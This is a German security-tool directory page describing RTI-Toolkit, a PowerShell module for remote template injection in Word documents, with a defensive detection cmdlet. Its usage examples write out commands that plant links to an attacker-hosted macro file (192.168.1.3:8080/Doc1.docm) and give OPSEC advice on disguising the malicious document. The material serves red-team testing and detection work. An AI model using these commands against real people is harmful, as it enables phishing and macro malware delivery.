Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RTI-Toolkit — PowerShell-Toolkit für Remote-Template-Injection-Angriffe und -Abwehr. Fügt bösartige Links in Office Word-Dokumente für Phishing ein, mit Erkennungsmodulen für Blue Teams. | Kitploit
Tools/GitHubGitHub/nickvourd/rti-toolkit
Phishing-ToolsPhishingPenetrationstestsRed Teaming
GitHubnickvourd/rti-toolkit

RTI-Toolkit

PowerShell-Toolkit für Remote-Template-Injection-Angriffe und -Abwehr. Fügt bösartige Links in Office Word-Dokumente für Phishing ein, mit Erkennungsmodulen für Blue Teams.

Repository anzeigen
559vor 2 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RTI-Toolkit

Remote Template Injection Toolkit

Beschreibung

RTI-Toolkit ist ein Open-Source-PowerShell-Toolkit für Remote Template Injection-Angriffe. Dieses Toolkit enthält ein PowerShell-Skript namens PS-Templator.ps1, das sowohl aus angreifender als auch aus defensiver Perspektive verwendet werden kann.

Die folgende Tabelle stellt die Hauptmodule (Cmdlets) von PS-Templator.ps1 dar:

CmdletBeschreibungPerspektive
Invoke-TemplateImplementiert Remote Template Links in Standard-Office-Word-VorlagenAngreifend
Invoke-RegularImplementiert Remote Template Links in regulären Office-Word-Dokumenten ohne VorlageAngreifend
Invoke-IdentifyIdentifiziert Remote Template Links in Office-Word-DOCX-Dokumenten mit/ohne VorlageDefensiv

⚠️ PS-Templator.ps1 unterstützt nur DOCX-Dateien.

ℹ️ Dieses Tool wird vom National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in CVE-2025-65318 und CVE-2025-65319 referenziert.

Version

1.0.0

Lizenz

Dieses Tool ist lizenziert unter der License: MIT.

Danksagung

Besonderer Dank geht an meine Freunde @Papadope9 und Stavros Gkounis (a.k.a purpl3ph03n1x), die während der Beta-Testphase des Tools unschätzbare Hilfe geleistet haben.

Dieses Tool wurde während eines iCAST Red Teaming Assessments mit @S1ckB0y1337 vor einigen Jahren inspiriert.

Supernova wurde mit ❤️ von @nickvourd erstellt.

Inhaltsverzeichnis

  • RTI-Toolkit
    • Beschreibung
    • Version
    • Lizenz
    • Danksagung
    • Inhaltsverzeichnis
    • Remote Template Injection (RTI)
    • Installation
    • Cmdlets
      • Invoke-Template
        • Invoke-Template Beispiel
      • Invoke-Regular
        • Invoke-Regular Beispiel
        • Invoke-Regular Beispiel 2
      • Invoke-Identify
        • Invoke-Identify Beispiel
        • Invoke-Identify Beispiel 2
    • Referenzen

Remote Template Injection (RTI)

Remote Template Injection (RTI) im Kontext von Microsoft Office bezieht sich auf eine spezifische Art von Sicherheitslücke, die durch bösartige Vorlagen in Office-Dokumenten (z. B. Word, Excel, PowerPoint) ausgenutzt werden kann.

Zum Beispiel wird der Inhalt in einer DOCX-Datei im XML-Format im Archiv gespeichert, und einige dieser XML-Dateien können auf externe Ressourcen oder Vorlagen verweisen. Angreifer können diese XML-Dateien manipulieren, um bösartige Links oder Inhalte einzufügen, die potenziell Sicherheitslücken ausnutzen oder Benutzer täuschen können.

Dies ist ein makrobasierter Angriff.

Installation

Um PS-Templator.ps1 als Modul in den Speicher zu laden, führen Sie den folgenden Befehl aus:

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ PS-Templator.ps1 funktioniert ohne die Notwendigkeit, zusätzliche Abhängigkeiten zu installieren.

ℹ️ PS-Templator.ps1 funktioniert als PowerShell-Modul.

ℹ️ PS-Templator.ps1 wurde auf einem Windows 10-Rechner mit Office 2019 Professional Plus getestet.

Cmdlets

Invoke-Template

Invoke-Template ist ein Cmdlet, das Remote Template Links in Standard-Office-Word-Vorlagen implementiert.

Invoke-Template Beispiel

Angenommen, Sie haben eine Standard-Word-Vorlage, wie zum Beispiel diese:

All Words Templates

Gespeichert als z. B. 'Name.docx':

Default Word Template Document

Wenn Sie das Cmdlet Invoke-Template verwenden, können Sie einen bösartigen Link in diese DOCX-Datei einfügen:

⚠️ Bevor Sie Invoke-Template ausführen, stellen Sie bitte sicher, dass Sie das Dokument gespeichert und geschlossen haben (seinen Prozess beendet haben).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Ergebnis:

Invoke-Template-1

Wie Sie sehen können, erstellt das Invoke-Template-Modul ein Backup des Originaldokuments und gibt den vollständigen Pfad zum bösartigen Dokument an.

Aus Debugging-Perspektive: Wenn Sie die bösartige DOCX-Datei in ein ZIP-Archiv konvertieren und in /word/_rels/settings.xml.rels gehen, können Sie den bösartigen Link sehen:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular ist ein Cmdlet, das Remote Template Links in regulären Office-Word-Dokumenten ohne Vorlagen implementiert.

Invoke-Regular Beispiel

Angenommen, Sie haben ein Standard-Word-Dokument ohne Vorlage, wie dieses:

Blank Document

Gespeichert als z. B. 'Doc1.docx':

Word Document

Wenn Sie das Cmdlet Invoke-Regular verwenden, können Sie einen bösartigen Link in diese DOCX-Datei einfügen:

⚠️ Bevor Sie Invoke-Regular ausführen, stellen Sie bitte sicher, dass Sie das Dokument gespeichert und geschlossen haben (seinen Prozess beendet haben).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Ergebnis:

Invoke-Regular-1

Wie Sie sehen können, erstellt das Invoke-Regular-Modul ein Backup des Originaldokuments und gibt den vollständigen Pfad zum bösartigen Dokument an.

Aus Debugging-Perspektive: Wenn Sie die bösartige DOCX-Datei in ein ZIP-Archiv konvertieren und in /word/_rels/settings.xml.rels gehen, können Sie den bösartigen Link sehen:

Invoke-Regular-Debug-1

Invoke-Regular Beispiel 2

Aus OPSEC-Perspektive können Sie -TemplateName in Verbindung mit dem Modul Invoke-Regular verwenden. Dadurch wirkt Ihr bösartiges Dokument legitimer, falls jemand versucht, es zu analysieren.

Hier ist ein Beispiel:

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

Ergebnis:

Invoke-Regular-Example-2

Aus Debugging-Perspektive: Wenn Sie die bösartige DOCX-Datei in ein ZIP-Archiv konvertieren und in /docProps/app.xml gehen, können Sie den gefälschten Vorlagennamen sehen:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-identify ist ein Cmdlet, das Remote Template Links in Office-Word-DOCX-Dokumenten mit/ohne Vorlage identifiziert.

Invoke-Identify Beispiel

Angenommen, Sie haben ein bösartiges Word-Dokument:

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Ergebnis:

Invoke-Identify Malicous Example

Invoke-Identify Beispiel 2

Angenommen, Sie haben ein nicht bösartiges Word-Dokument:

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Ergebnis:

Invoke-Identify Clean Example

Referenzen

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub by John Woodman
  • Invoke-Templator GitHub by Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub by Inf0secRabbit
Tool herunterladen